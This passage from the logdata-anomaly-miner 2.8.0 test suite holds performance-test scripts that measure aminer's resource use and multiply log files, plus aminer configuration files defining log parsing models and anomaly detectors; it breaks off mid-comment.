aminer.py sudo pkill -x aminer wait $PID sudo chown -R $USER:$USER $RESULTS_PATH 2> /dev/null printf " in $waitingTime seconds.\nThe source file contains $LINE_NUMBER log lines.\n\nmachine name, CPU name, #CPUs used, RAM used, persistent memory type\n$MACHINE_NAME, $CPU_NAME, $CPU_Number, $RAM_Used, $Persistent_Memory_Type\n\nConfig File,config_$t.py\nMD5-Hash Logfile,$MD5\nTest description,$description\n\n" >> $RESULTS_PATH mv $RESULTS_PATH $RESULTS_DIR cp $FILE $RESULTS_DIR/config_$t.py echo "" echo "Performance test finished!" logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/generateSystemLogdata.py000066400000000000000000000033611500476301700326360ustar00rootroot00000000000000# This file can be used to test the VariableTypeDetector. It provides discrete # and continuous data measured from the running system. import psutil import time import sys from datetime import datetime import multiprocessing with open('/tmp/results.csv', 'a+', buffering=100) as file: string = '' string += 'time,aminerCpuUsage,aminerMemUsage,' for i in range(multiprocessing.cpu_count()): string += "cpu%d," % (i+1) string += 'vmTotal,vmAvailable,vmPercent,vmUsed,vmFree\n' startTime = time.time() endTime = startTime + int(sys.argv[1]) p = None ppid = None firstRead = False while time.time() < endTime: t = time.time() for proc in psutil.process_iter(): if psutil.pid_exists(proc.pid) and proc.name() == "aminer": pid = proc.pid if p is None or pid > ppid: ppid = pid p = psutil.Process(ppid) firstRead = True if psutil.pid_exists(ppid): aminerCpu = str(p.cpu_percent(interval=0.0)) mem = "%.2f" % p.memory_percent() else: aminerCpu = '-' mem = '-' cpus = psutil.cpu_percent(percpu=True) dt = datetime.fromtimestamp(time.time()).strftime("%Y-%m-%d %H:%M:%S") vm = psutil.virtual_memory() cpu = "" for i in range(multiprocessing.cpu_count()): cpu = cpu + str(cpus[i]) + ',' if firstRead is True: firstRead = False else: string += "%s,%s,%s,%s%s,%s,%s,%s,%s\n" % (dt, aminerCpu, mem, cpu, vm[0], vm[1], vm[2], vm[3], vm[4]) delta = time.time()-t if delta < 1: time.sleep(1-delta) file.write(string) file.close() logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/multiplyLogFile.sh000077500000000000000000000010751500476301700314510ustar00rootroot00000000000000#!/bin/bash if [[ $# -lt 3 ]]; then echo "Error, not enough parameters found!" echo "Please run the script as follows: ./multiplyLogFile.sh numberOfCopies templateFile targetFile" echo "For example: ./multiplyLogFile.sh 2700000 syslog-template /tmp/syslog" exit fi iterations=$1 src=$2 target=$3 sudo rm $target 2> /dev/null # read the sourcefile into an array. mapfile -t srcArray < $src i=0 while [ $i -lt $iterations ]; do if [ $i -eq 0 ]; then printf "%s\n" "${srcArray[@]}" > $target else printf "%s\n" "${srcArray[@]}" >> $target fi i=$((i + 1)) done logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/performance-config.py000066400000000000000000000140371500476301700321110ustar00rootroot00000000000000# This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement parsing_model = AnyByteDataModelElement('AnyByteDataModelElement') # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [atom_filter], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector( analysis_context.aminer_config, ['/AnyByteDataModelElement'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/performance-config1.py000066400000000000000000000435711500476301700321770ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('FixedWorkload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Start Time', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] parsing_model = FirstMatchModelElement('model', [ SequenceModelElement('CronAnnouncement', service_children_cron_job_announcement), SequenceModelElement('CronExecution', service_children_cron_job_execution), SequenceModelElement('DailyCron', service_children_cron_job), SequenceModelElement('DiskReport', service_children_disk_report), SequenceModelElement('LoginDetails', service_children_login_details), DecimalIntegerValueModelElement('Random'), SequenceModelElement('RandomTime', service_children_random_time), SequenceModelElement('Sensors', service_children_sensors), SequenceModelElement('IPAddresses', service_children_user_ip_address)]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([atom_filter]) analysis_context.register_component(simple_monotonic_timestamp_adjust, component_name="SimpleMonotonicTimestampAdjust") from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler stream_printer_event_handler = StreamPrinterEventHandler(analysis_context) anomaly_event_handlers = [stream_printer_event_handler] # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(parsing_model, [simple_monotonic_timestamp_adjust], anomaly_event_handlers) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/Job Number'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis( analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter(sys.stdout, [ '/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule( 'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests/performance-config2.py000066400000000000000000000550321500476301700321730ustar00rootroot00000000000000from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.Base64StringModelElement import Base64StringModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.MultiLocaleDateTimeModelElement import MultiLocaleDateTimeModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement # This is a template for the "aminer" logfile miner tool. Copy # it to "config.py" and define your ruleset. config_properties = {} # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading config_properties['LogResourceList'] = ['file:///tmp/syslog'] # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties['AminerUser'] = 'aminer' config_properties['AminerGroup'] = 'aminer' # Define the path, where aminer will listen for incoming remote # control connections. When missing, no remote control socket # will be created. # config_properties['RemoteControlSocket'] = '/var/run/aminer-remote.socket' # Read the analyis from this file. That part of configuration # is separated from the main configuration so that it can be loaded # only within the analysis child. Non-absolute path names are # interpreted relatively to the main configuration file (this # file). When empty, this configuration has to contain the configuration # for the child also. # config_properties['AnalysisConfigFile'] = 'analysis.py' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. config_properties['Core.PersistenceDir'] = '/tmp/lib/aminer' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. config_properties['MailAlerting.TargetAddress'] = 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. config_properties['MailAlerting.FromAddress'] = 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" config_properties['MailAlerting.SubjectPrefix'] = 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). config_properties['MailAlerting.AlertGraceTime'] = 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. config_properties['MailAlerting.EventCollectTime'] = 0 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. config_properties['MailAlerting.MinAlertGap'] = 0 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. config_properties['MailAlerting.MaxAlertGap'] = 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 config_properties['MailAlerting.MaxEventsPerMessage'] = 1000 config_properties['LogPrefix'] = 'Original log line: ' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """ Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ date_format_string = b'%Y-%m-%d %H:%M:%S' cron = b' cron[' # Build the parsing model: service_children_disk_report = [ FixedDataModelElement('Space', b' Current Disk Data is: Filesystem Type Size Used Avail Use%'), DelimitedDataModelElement('Data', b'%'), AnyByteDataModelElement('Rest')] service_children_login_details = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedWordlistDataModelElement('Status', [ b' logged in', b' logged out']), OptionalMatchModelElement('PastTime', SequenceModelElement('Time', [ FixedDataModelElement('Blank', b' '), DecimalIntegerValueModelElement('Minutes'), FixedDataModelElement('Ago', b' minutes ago.')]))] service_children_cron_job = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('UNameSpace1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('UNameSpace2', b' '), DelimitedDataModelElement('User', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Details', b']: Job `cron.daily` started.')] service_children_random_time = [FixedDataModelElement('Space', b'Random: '), DecimalIntegerValueModelElement('Random')] service_children_sensors = [ SequenceModelElement('CPUTemp', [ FixedDataModelElement('FixedTemp', b'CPU Temp: '), DecimalIntegerValueModelElement('Temp'), FixedDataModelElement('Degrees', b'\xc2\xb0C')]), FixedDataModelElement('Space1', b', '), SequenceModelElement('CPUWorkload', [ FixedDataModelElement('Fixed Workload', b'CPU Workload: '), DecimalIntegerValueModelElement('Workload'), FixedDataModelElement('Percent', b'%')]), FixedDataModelElement('Space2', b', '), DateTimeModelElement('DTM', date_format_string)] service_children_user_ip_address = [ FixedDataModelElement('User', b'User '), DelimitedDataModelElement('Username', b' '), FixedDataModelElement('Action', b' changed IP address to '), IpAddressDataModelElement('IP')] service_children_cron_job_announcement = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Run', b']: Will run job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Start Time', b'\' in 5 min.')] service_children_cron_job_execution = [ DateTimeModelElement('DTM', date_format_string), FixedDataModelElement('Space1', b' '), DelimitedDataModelElement('UName', b' '), FixedDataModelElement('Cron', cron), DecimalIntegerValueModelElement('JobNumber'), FixedDataModelElement('Job', b']: Job `'), FixedWordlistDataModelElement('CronType', [b'cron.daily', b'cron.hourly', b'cron.monthly', b'cron.weekly']), FixedDataModelElement('Started', b'\' started')] service_children_parsing_model_element = [ DateTimeModelElement('DateTimeModelElement', b'Current DateTime: %d.%m.%Y %H:%M:%S'), DecimalFloatValueModelElement('DecimalFloatValueModelElement', value_sign_type='optional'), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement', value_sign_type='optional', value_pad_type='blank'), SequenceModelElement('', [ DelimitedDataModelElement('DelimitedDataModelElement', b';'), FixedDataModelElement('FixedDataModelElement', b';')])] # ElementValueBranchModelElement fixed_data_me1 = FixedDataModelElement("fixed1", b'match ') fixed_data_me2 = FixedDataModelElement("fixed2", b'fixed String') fixed_wordlist_data_model_element = FixedWordlistDataModelElement("wordlist", [b'data: ', b'string: ']) decimal_integer_value_model_element = DecimalIntegerValueModelElement("decimal") service_children_parsing_model_element.append( ElementValueBranchModelElement('ElementValueBranchModelElement', FirstMatchModelElement("first", [ SequenceModelElement("seq1", [fixed_data_me1, fixed_wordlist_data_model_element]), SequenceModelElement("seq2", [fixed_data_me1, fixed_wordlist_data_model_element, fixed_data_me2])]), "wordlist", {0: decimal_integer_value_model_element, 1: fixed_data_me2})) service_children_parsing_model_element.append(HexStringModelElement('HexStringModelElement')) service_children_parsing_model_element.append(SequenceModelElement('', [ FixedDataModelElement('FixedDataModelElement', b'Gateway IP-Address: '), IpAddressDataModelElement('IpAddressDataModelElement')])) service_children_parsing_model_element.append( MultiLocaleDateTimeModelElement('MultiLocaleDateTimeModelElement', [(b'%b %d %Y', "de_AT.utf8", None)])) service_children_parsing_model_element.append(RepeatedElementDataModelElement( 'RepeatedElementDataModelElement', SequenceModelElement('SequenceModelElement', [ FixedDataModelElement('FixedDataModelElement', b'drawn number: '), DecimalIntegerValueModelElement('DecimalIntegerValueModelElement')]), 1)) service_children_parsing_model_element.append(VariableByteDataModelElement('VariableByteDataModelElement', b'-@#')) service_children_parsing_model_element.append(SequenceModelElement('', [ WhiteSpaceLimitedDataModelElement('WhiteSpaceLimitedDataModelElement'), FixedDataModelElement('', b' ')])) # The Base64StringModelElement must be just before the AnyByteDataModelElement to avoid 